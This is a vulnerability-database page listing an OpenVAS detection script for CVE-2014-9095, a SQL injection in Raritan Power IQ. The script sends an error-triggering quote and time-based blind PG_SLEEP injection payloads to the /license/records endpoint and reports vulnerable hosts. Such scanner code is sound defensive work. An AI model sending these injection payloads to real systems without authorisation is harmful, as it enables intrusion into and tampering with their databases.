Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2014 Greenbone AGOPENVAS:1361412562310105922
HistoryAug 15, 2014 - 12:00 a.m.

Raritan Power IQ SQL Injection Vulnerability

2014-08-1500:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
5

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.9

Confidence

Low

EPSS

0.001

Percentile

35.0%

JSON

Raritan Power IQ SQL Injection Vulnerability

# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:raritan:power_iq";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105922");
  script_version("2023-07-26T05:05:09+0000");
  script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
  script_tag(name:"creation_date", value:"2014-08-15 16:50:19 +0700 (Fri, 15 Aug 2014)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_cve_id("CVE-2014-9095");

  script_name("Raritan Power IQ SQL Injection Vulnerability");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2014 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_raritan_poweriq_detect.nasl");
  script_mandatory_keys("raritan_poweriq/detected");
  script_require_ports("Services/www", 443);

  script_tag(name:"summary", value:"Raritan Power IQ SQL Injection Vulnerability");

  script_tag(name:"vuldetect", value:"Tries to execute a time-based blind
  SQL injection and checks the response time.");

  script_tag(name:"insight", value:"Raritan PowerIQ is vulnerable to SQL injection.
  A remote attacker could send specially-crafted SQL statements to the /license/records
  script using the sort or dir parameter, which could allow the attacker to view, add,
  modify or delete information in the back-end database.");

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to
  inject or manipulate SQL queries in the back-end database, allowing for the manipulation
  or disclosure of arbitrary data.");

  script_tag(name:"affected", value:"Raritan Power IQ 4.2.2, 4.1.3 and below.");

  script_tag(name:"solution", value:"Install the patch from Raritan found in the references.");

  script_xref(name:"URL", value:"https://www.raritan.com/support/product/poweriq/security-patches");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/68722");
  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2014/Jul/79");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/94717");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

url = "/license/records";
data = "sort=id&dir=ASC";
useragent = http_get_user_agent();

host = http_host_name(port:port);

req = string('POST ', url, ' HTTP/1.1\r\n',
             'Host: ', host, '\r\n',
             'User-Agent: ', useragent, '\r\n',
             'Content-Type: application/x-www-form-urlencoded\r\n',
             'Content-Length: ', strlen(data), '\r\n',
             'X-Requested-With: XMLHttpRequest\r\n',
             '\r\n',
             data);
start = unixtime();
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
stop = unixtime();

if (res !~ "^HTTP/1\.[01] 200" || '"rows":' >!< res) {
  exit(0);
}

data = "sort=id'&dir=ASC";
req = string('POST ', url, ' HTTP/1.1\r\n',
             'Host: ', host, '\r\n',
             'User-Agent: ', useragent, '\r\n',
             'Content-Type: application/x-www-form-urlencoded\r\n',
             'Content-Length: ', strlen(data), '\r\n',
             'X-Requested-With: XMLHttpRequest\r\n',
             '\r\n',
             data);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if (res !~ "^HTTP/1\.[01] 500")
  exit(0);

# Execute time based check
latency = stop - start;

temp = 0;

foreach i (make_list(1, 3)) {
  data = "sort=(SELECT 5480 FROM PG_SLEEP(" + i + "))&dir=ASC";
  req =  string('POST ', url, ' HTTP/1.1\r\n',
                'Host: ', host, '\r\n',
                'User-Agent: ', useragent, '\r\n',
                'Content-Type: application/x-www-form-urlencoded\r\n',
                'Content-Length: ', strlen(data), '\r\n',
                'X-Requested-With: XMLHttpRequest\r\n',
                '\r\n',
                data);

  start = unixtime();
  res = http_keepalive_send_recv(port:port, data:req);
  stop = unixtime();

  if (stop - start < i || stop - start > (i+5+latency))
    exit(0);
  else
   temp += 1;
}

if (temp == 2) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit( 0 );
}

exit( 99 );

Related

cve 1
nvd 1
prion 1
cvelist 1
exploitdb 1
cve
cve
CVE-2014-9095
2014-11-26 15:59:11
nvd
nvd
CVE-2014-9095
2014-11-26 15:59:11
prion
prion
Sql injection
2014-11-26 15:59:00
cvelist
cvelist
CVE-2014-9095
2014-11-26 15:00:00
exploitdb
exploitdb
Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)
2014-07-21 00:00:00

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.9

Confidence

Low

EPSS

0.001

Percentile

35.0%

JSON
Related for OPENVAS:1361412562310105922
cve1nvd1prion1cvelist1exploitdb1